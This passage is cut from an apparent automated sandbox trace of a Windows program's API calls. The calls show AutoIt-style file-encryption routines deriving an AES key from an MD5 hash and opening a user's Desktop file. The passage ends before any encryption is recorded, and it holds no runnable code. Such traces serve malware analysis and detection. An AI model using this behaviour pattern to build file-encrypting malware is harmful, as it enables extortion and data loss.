dwCmpFlags=0x1, lpString1="sktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.285] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.285] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0161.285] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0161.285] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.285] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.285] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.285] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.285] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.285] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.285] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f29a7a0, ftCreationTime.dwHighDateTime=0x1d5e792, ftLastAccessTime.dwLowDateTime=0xea88a2f0, ftLastAccessTime.dwHighDateTime=0x1d5e311, ftLastWriteTime.dwLowDateTime=0xea88a2f0, ftLastWriteTime.dwHighDateTime=0x1d5e311, nFileSizeHigh=0x0, nFileSizeLow=0x14234, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="gJmnMJqziFMsIe_.wav", cAlternateFileName="GJMNMJ~1.WAV")) returned 0x90af58 [0161.285] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0161.285] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.285] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.285] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.285] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.286] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0161.286] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.286] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0161.286] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.286] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0161.286] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.286] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.286] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.286] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.286] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0161.286] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.286] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0161.287] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.287] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.287] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0161.287] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.287] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.287] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.287] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.288] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.288] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.288] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.288] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.288] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.288] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.288] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.288] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.288] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0161.288] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.288] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.288] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.288] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.288] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.288] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.288] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.297] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.297] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.297] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.297] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.297] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.297] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.297] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.297] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.297] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.297] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.297] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0161.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.297] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0161.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.298] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.298] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.298] CryptHashData (hHash=0x90ae18, pbData=0x8debf0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0161.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.298] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.298] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.298] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.298] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.298] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0161.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.298] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.298] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0161.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.298] CryptDestroyHash (hHash=0x90ae18) returned 1 [0161.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.298] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.298] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.299] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.299] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.299] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gjmnmjqzifmsie_.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0161.299] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.300] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0161.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0161.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0161.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0161.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0161.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0161.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0161.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0161.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0161.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0161.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0161.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0161.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0161.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0161.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0161.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0161.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.301] HeapFree (in: 